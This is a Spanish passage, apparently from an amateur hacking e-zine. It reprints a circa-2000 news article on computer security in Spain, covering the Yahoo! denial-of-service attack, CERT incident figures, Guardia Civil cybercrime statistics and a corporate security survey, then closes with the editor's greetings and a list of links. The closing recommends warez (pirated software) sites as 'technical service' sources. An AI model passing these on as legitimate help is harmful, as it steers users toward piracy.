los programas tienen fallos. Que caigan máquinas, si así se dan cuenta". Según Cea, los administradores de estos sistemas tienen parte de culpa, pero también las empresas, que "nunca les piden experiencia en seguridad", o los usuarios, que "sólo ven la parte negativa de las políticas de seguridad, la incomodidad de, por ejemplo, tener que utilizar claves difíciles". Parecida opinión muestra Jordi Linares, de la sección española del Computer Emergency Response Team, la llamada "policía de Internet": "Si se entendiese la seguridad como un proceso y no como un estado, se podrían evitar muchos incidentes. Todos los problemas que tratamos son de fallos ya descubiertos, de los que se ha advertido a veces hace años y pueden repararse con un parche". Al esCERT se dirigen las empresas que sufren accesos no autorizados a sus ordenadores, intentos de entrada, ataques de Denegación de Servicio y otros. Aunque el año pasado atendieron 43 casos, la cifra de incidentes reales es muy superior y difícil de determinar, ya que muchas empresas los
solucionan ellas mismas, como la de Jesús Cea, que asegura no haber denunciado nunca ningún ataque. De todas formas, las estadísticas del esCERT son una pintura a pequeña escala del panorama: suben los incidentes, realizados con instrumentos automatizados, y se hacen más graves. En el caso de los DoS, asegura Linares, "antes afectaban a un servicio concreto de una máquina ('mail bombing', 'syn flood'), mientras que ahora paran el funcionamiento de toda la máquina o de toda la red". La situación es parecida en las universidades, aunque allí los incidentes se cuadriplican y crecen a ritmo de un 47%, debido a su tradicional obertura y descuido en la administración de sistemas. De enero a octubre de 1999, el CERT de la red académica RedIris atendió 162 casos, más 78 por correo basura o "spam". Casi la mitad no se solucionan nunca. No debe extrañar entonces que, en la mayoría de intrusiones informáticas investigadas por las fuerzas de la ley, las universidades se lleven parte del protagonismo. Los accesos ilegales a ordenadores han subido en las estadísticas que maneja el Grupo de Delitos de Alta Tecnología de la Guardia Civil, usualmente tipificados como revelación de secretos y daños, el 43% del total. El fraude electrónico (9,5%), los delitos contra la propiedad industrial (14,3%) y la propiedad intelectual (19,5%) completan el reparto. "En España estamos comenzando a sufrir este tipo de delitos y se está produciendo un incremento exponencial. De una media semanal de 2 casos investigados a finales de 1996 se pasa a finales de 1999 a un volumen de 25 casos semanales", asegura el capitán Anselmo del Moral, en un reciente artículo de la revista interna de la Guardia Civil. El rumor empieza también a correr, ya casi un clamor después del caso Yahoo!, en círculos profesionales y de empresa. "El mercado de seguridad informática va para arriba. En tres años habrá un buen ritmo. Las compañías deberían preocuparse de comprar servicio externo e interno", asegura José de la Peña, director de la revista "Seguridad en Informática y Comunicaciones (SIC)". Aunque en Estados Unidos ya ha despegado, en España se empieza desde "volúmenes ridículos: hay muy pocas empresas con capital español dedicadas a crear productos o consultoría, se cuentan con los dedos de la mano. La compra de soluciones de seguridad no ha empezado hasta el segundo trimestre de 1999", explica De la Peña. De todas formas, la compra no es siempre la mejor o única solución, ya que hay muchos programas libres de análisis y defensa, por ser un tema que interesa a los 'hackers'.
Mantener una política de seguridad es el reto no superado en las empresas, incluso "en las que dan servicios basados en tecnología, que no cuidan que sean seguros", recrimina el periodista. Aunque el problema no es sólo la concienciación de la compañía, dice De la Peña, sino también la poca oferta actual de buenos profesionales: "No hay", se queja.
Incidentes como el ataque de Denegación de Servicio contra Yahoo! son útiles para despertar la consciencia dormida sobre la necesidad de una mayor seguridad informática en los ordenadores de empresas y organismos. Hace diez años, los sistemas conectados a la red eran totalmente abiertos, pero con cada nuevo incidente se han ido cerrando, hasta hoy, cuando es comúnmente aceptado que, por su propio bien y el de sus vecinos, una empresa debe tener la seguridad entre sus principales prioridades.
La consultora Ernst&Young realiza la única encuesta pública sobre el estado de esta cuestión en España. Sus últimos resultados, correspondientes a 1998, no son muy tranquilizadores: el 80% de compañías no tienen establecido un plan de acción ante un problema de seguridad informática, sólo una de cada siete cifra su información confidencial y el 56% no investiga los intentos de acceso o actividades poco usuales en sus redes. Mientras la seguridad es dejada aparte, crecen como la espuma las nuevas empresas que entran en la red (en 1998 el porcentaje subió del 27% al 84%). Algunas (el 53%) aseguran tener una política de seguridad, sin especificar si realmente obligan a cumplirla. Como afirma el informe, "la importancia que se da a la seguridad informática no siempre va unida a la implantación de medidas concretas". Según los empresarios, los principales obstáculos para mejorar la fiabilidad de sus sistemas son el presupuesto (36%) y la concienciación de los empleados (el 32%).
Primero que nada, gracias a todos los cibernautas que han descargado la revista. Quiero mandarle un saludo a mis colegas; Fidelito601, quien creo junto a mi esta e-zine, JonyFC, un compañero, el cual siempre esta dispuesto a escuchar, BcBonilla,
compañero de trabajo, CCX42, compañero de trabajo, OTA, y GP, quienes me han enseñado mucho con respecto a los sistemas operativos, LUK & Clarinetista, de HackHispano, que siempre han dado una respuesta con respecto a mis dudas, entre otros. Todas estas personas, son con las que he pasado buenos y malos momentos, y con esta revista pretendo agradecerles a todas estas personas, por su gran apoyo. Actualmente, muchas personas, al preguntarme sobre el Hacking, consecuentemente a la pregunta, viene otra, pidiéndome que les diga, donde he aprendido todo lo que se sobre el Hacking y otras ramas de la informática, por ese motivo quiero recomendar una serie de webs las cuales seguro les ayudaran a ampliar sus conocimientos. www.HackHispano.com www.InfiernoHacker.com www.PortalHacker.Net www.Elhacker.net www.SecurityByDefault.com www.BlackPloit.com www.EnElPc.com www.SiriusHack.Blogspot.com Ahora, quiero recomendar tres web’s, en las cuales no se habla tanto de informática (Hacking), sino que se habla màs del servicio técnico, y en donde podras encontrar solución a tus problemas. www.warezvirtual.com www.fullwarez.info www.clubconsolas.com Gracias a la colaboración especial de Fidelito601. Ahora solo una cosa màs para decir.
“Solo el conocimiento te hace libre”. -Revista creada por SiriusBl@ck, con la colaboración especial de Fidelito601, un gran compañero. Saludos & Suerte.
View more...
Comments
